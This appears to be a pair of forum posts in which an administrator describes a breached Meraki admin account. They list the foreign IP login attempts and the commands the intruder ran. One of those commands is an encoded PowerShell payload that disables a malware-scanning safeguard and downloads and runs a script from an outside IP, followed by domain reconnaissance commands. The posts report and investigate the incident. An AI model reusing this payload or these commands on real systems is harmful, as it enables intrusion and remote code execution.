Meraki support person called and proceeded to read from a corporate comms stating how they've seen this activity accross multiple clients and should change passwords blah, blah, blah   Offered to have their security team reach out, which I said yes and if they can answer why the 2fa email didn't come through.   Checked the users laptop and it's fine and O365 logs show no emails from Meraki to them... ... View more

I got one of these a 2 weeks ago (which I missed as I was on holiday) and then this morning. Checked and there's been multiple failed aand sucesfull logins to a second admin account from all over the world. admin2 is the compromised account. admin1 is mine.   admin2@local.com 193.56.73.134 , Turkey Login Failure Sat, 03 Dec 2022 16:32:22 GMT admin2@local.com 89.187.185.171 Los Angeles, CA Login Failure Sat, 03 Dec 2022 14:25:11 GMT admin2@local.com 193.202.9.119 Clinton, MD Login Success Sat, 19 Nov 2022 23:20:38 GMT admin1@local.com 212.60.21.161 Barnsbury, United Kingdom Login Failure Fri, 18 Nov 2022 05:41:00 GMT admin1@local.com 85.239.35.184 , Russian Federation Login Failure Wed, 16 Nov 2022 17:19:25 GMT admin1@local.com 185.68.154.40 , Login Failure Fri, 11 Nov 2022 01:07:37 GMT admin2@local.com 185.61.217.156 Chisinau, Moldova Login Failure Wed, 09 Nov 2022 17:01:43 GMT admin1@local.com 45.132.186.237 , Australia Login Failure Wed, 09 Nov 2022 16:54:31 GMT admin2@local.com 45.10.164.207 , Canada Login Failure Wed, 09 Nov 2022 14:41:08 GMT admin2@local.com 171.22.30.220 Amsterdam, Netherlands Login Success Fri, 28 Oct 2022 22:15:33 GMT admin1@local.com 194.156.124.37 London, United Kingdom Login Failure Sun, 23 Oct 2022 22:24:20 GMT admin2@local.com 193.233.251.191 Sheridan, WY Login Failure Sun, 23 Oct 2022 15:38:49 GMT admin1@local.com 185.94.34.99 , Login Failure Wed, 12 Oct 2022 12:18:20 GMT admin1@local.com 88.218.45.62 Amsterdam, Netherlands Login Failure Tue, 11 Oct 2022 20:50:44 GMT admin2@local.com 45.140.204.187 , China Login Success Sat, 08 Oct 2022 19:08:14 GMT admin2@local.com 45.138.100.147 Frankfurt Am Main, Germany Login Success Sat, 08 Oct 2022 09:23:25 GMT admin2@local.com 95.216.4.218 Tuusula, Finland Login Success Mon, 03 Oct 2022 20:23:18 GMT admin2@local.com 89.22.239.167 Moskva, Russian Federation Login Success Mon, 03 Oct 2022 06:21:11 GMT admin2@local.com 193.56.65.139 , Turkey Login Success Sun, 02 Oct 2022 20:19:32 GMT admin1@local.com 193.203.9.179 , United Kingdom Login Failure Fri, 30 Sep 2022 04:27:16 GMT admin2@local.com 185.61.218.92 Montauban, France Login Failure Fri, 30 Sep 2022 03:50:17 GMT admin2@local.com 45.80.105.83 , United Kingdom Login Failure Wed, 28 Sep 2022 14:11:59 GMT admin1@local.com 91.243.190.219 , China Login Failure Tue, 27 Sep 2022 17:44:48 GMT admin1@local.com 85.239.36.154 , Germany Login Failure Tue, 27 Sep 2022 06:51:20 GMT admin1@local.com 83.142.55.240 , United Kingdom Login Failure Tue, 27 Sep 2022 00:52:51 GMT admin1@local.com 37.44.197.32 , Poland Login Failure Mon, 26 Sep 2022 10:47:34 GMT admin1@local.com 194.104.8.233 , Canada Login Failure Mon, 19 Sep 2022 22:51:48 GMT admin1@local.com 45.148.234.11 , United Kingdom Login Failure Thu, 15 Sep 2022 02:22:15 GMT   What's strange is this admin2 account was created about 6 years ago and never used. What's more confusing is that the persons email account never got any of the emails with a confirmation code to login with. (perhpas something with it being so old it doesn't get it?)   What's not confusing is what they were up to...   Command Line request command: powershell -e DQAKAFAAbwB3AGUAcgBTAGgAZQBsAGwALgBlAHgAZQAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAAaABpAGQAZABlAG4AIAB7AA0ACgAkAGEAPQAiADUANAA5ADIAOAA2ADgANwA3ADIAOAAwADEANwA0ADgANgA4ADgAMQA2ADgANwA0ADcAMgA4ADAANwAyADgAMQA4ADcAMQA3ADMANgA4ADgAOAA3ADgAMgA4ADAANgA4ADgANwA3ADYAOAAyADgAIgANAAoAJABiAD0AIgAxADEANwAzADYAOAAwADgANgA3ADYANQA2ADgANwA3ADYANwA5ADgANgA2ADgAOAAwADgANgA3ADYANAA0ADgAMQA3ADYAOAA3ADQAMQA2ADgANwA2ADcAOQA3ADIANwAxACIADQAKACQAYwA9AFsAcwB0AHIAaQBuAGcAXQAoADAALgAuADMANwB8ACUAewBbAGMAaABhAHIAXQBbAGkAbgB0AF0AKAAyADkAKwAoACQAYQArACQAYgApAC4AcwB1AGIAcwB0AHIAaQBuAGcAKAAoACQAXwAqADIAKQAsADIAKQApAH0AKQAtAHIAZQBwAGwAYQBjAGUAIAAiACAAIgANAAoAJABkAD0AWwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACQAYwApAA0ACgAkAGUAPQBbAHMAdAByAGkAbgBnAF0AKAAzADgALgAuADUAMQB8ACUAewBbAGMAaABhAHIAXQBbAGkAbgB0AF0AKAAyADkAKwAoACQAYQArACQAYgApAC4AcwB1AGIAcwB0AHIAaQBuAGcAKAAoACQAXwAqADIAKQAsADIAKQApAH0AKQAtAHIAZQBwAGwAYQBjAGUAIAAiACAAIgANAAoAJABmAD0AJABkAC4ARwBlAHQARgBpAGUAbABkACgAJABlACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQANAAoAJABmAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkADQAKAEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADQALgAxADgAMAAuADQAOAAuADEAMQA2ADoANAA3ADQANAAzAC8AcwB2AGMAaABvAHMAdAAuAHAAcwAxACcAKQApAA0ACgB9AA0ACgA= Command Line request command: powershell (Get-ADComputer -Filter *).Count Command Line request command: net users /domain   PC it was run on seems fine, run 3 different AV/Anti malware and Autoruns.(open to anything else worth running on it) other 5 PCs on the network we've run the above and seem fine. Unfortuantly all the event logs have rolled over from the date it occured 😞   I won't lie, admin2 probably had a crappy password  but not sure how they got around the email alerts.(will be looking at uses laptop soon)   Awaiting a call from Meraki now to speak to them about it... will update if anything interesting... Merry Christmas! ... View more